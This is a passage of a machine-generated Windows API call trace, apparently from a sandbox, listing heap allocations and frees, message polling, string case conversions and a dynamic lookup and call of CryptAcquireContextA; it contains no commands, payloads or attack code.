lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.985] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.985] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0086.986] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6098 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x15) returned 0x29f6fa0 [0086.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fa0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0086.986] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0086.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6098 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0086.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0086.987] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0086.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0086.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.989] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.990] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0086.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.990] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0086.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.990] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.990] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0086.991] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0086.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.991] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0086.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.991] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0086.991] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0086.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0086.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0086.992] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.992] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0086.992] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.992] RtlAllocateHeap 